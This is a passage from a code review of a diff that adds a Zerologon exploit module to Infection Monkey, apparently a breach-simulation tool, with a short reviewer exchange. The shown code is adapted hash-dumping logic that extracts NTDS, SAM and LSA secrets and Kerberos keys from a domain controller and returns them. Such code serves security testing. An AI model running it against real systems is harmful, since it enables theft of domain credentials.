monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+                                            noLMHash=self.__no_lmhash, remoteOps=self.__remote_ops,
+                                            useVSSMethod=self.__use_VSS_method, justNTLM=self.__just_DC_NTLM,
+                                            pwdLastSet=self.__pwd_last_set, resumeSession=self.__resume_file_name,
+                                            outputFileName=self.__output_file_name, justUser=self.__just_user,
+                                            printUserStatus=self.__print_user_status)
+            try:
+                self.__NTDS_hashes.dump()
+            except Exception as e:
+                LOG.debug(traceback.print_exc())
+                if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
+                    # We don't store the resume file if this error happened, since this error is related to lack
+                    # of enough privileges to access DRSUAPI.
+                    resume_file = self.__NTDS_hashes.getResumeSessionFile()
+                    if resume_file is not None:
+                        os.unlink(resume_file)
+                LOG.error(e)
+                if self.__just_user and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
+                    LOG.error("You just got that error because there might be some duplicates of the same name. "
+                              "Try specifying the domain name for the user as well. It is important to specify it "
+                              "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
+                elif self.__use_VSS_method is False:
+                    LOG.error('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
+            self.cleanup()
+        except (Exception, KeyboardInterrupt) as e:
+            LOG.debug(traceback.print_exc())
+            LOG.error(e)
+            if self.__NTDS_hashes is not None:
+                if isinstance(e, KeyboardInterrupt):
+                    resume_file = self.__NTDS_hashes.getResumeSessionFile()
+                    if resume_file is not None:
+                        os.unlink(resume_file)
+            try:
+                self.cleanup()
+            except Exception:
+                pass
+        finally:
+            dumped_secrets = _unset_stdout_and_return_captured()  # includes hashes and kerberos keys
+            return dumped_secrets
+
+    def cleanup(self):
+        LOG.debug('Cleaning up...')
+        if self.__remote_ops:
+            self.__remote_ops.finish()
+        if self.__SAM_hashes:
+            self.__SAM_hashes.finish()
+        if self.__LSA_secrets:
+            self.__LSA_secrets.finish()
+        if self.__NTDS_hashes:
+            self.__NTDS_hashes.finish()
+
+
+# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
+# Used to get HKLM keys for restoring original DC password
+class Wmiexec:
```

Comment:
What been changed here from the base example? Also should end up in a separate file

Reply:
Removed whatever isn't needed